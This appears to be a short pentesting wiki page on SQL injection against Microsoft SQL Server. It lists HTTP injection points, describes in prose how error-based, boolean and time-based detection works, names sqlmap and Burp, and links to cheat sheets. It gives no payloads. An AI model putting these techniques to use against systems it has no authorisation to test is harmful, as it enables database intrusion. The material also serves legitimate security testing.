MSSQL.md

Microsoft SQL Server is a relational database management system developed by Microsoft. Microsoft markets a dozen different editions of Microsoft SQL Server with various functionalities and aims. A list of the versions is available : https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version-edition-and-update-level-of-sql-server-an

MSSQL supports stacked queries.

Vulnerable parameters detection

Injection locations

In a HTTP request there are a few possible injection points :

• URL parameters

• POST parameters

• Cookie names and values

• Host header and any custom headers

Note that while the entry points above are the most common, any content in an HTTP request can be prone to SQL injection.

Injection detection

Detecting vulnerable parameters is most easily done by triggering errors and boolean logic within the application. Supplying malformed queries will trigger errors and sending valid queries with various boolean logic statements may trigger different responses from the web server. Time based payload can also be used to detect SQL injection in MSSQL.

Automated detection

The detection of vulnerable parameters can be automated, using the BurpSuite Pro scanner or sqlmap for example.

Note that second order SQL injection, which arises when user-supplied data is first stored by the application and then later incorporated into SQL queries in an unsafe manners, may not be properly detected by automatic tools.

Databases dumping

References

https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ https://www.asafety.fr/mssql-injection-cheat-sheet http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet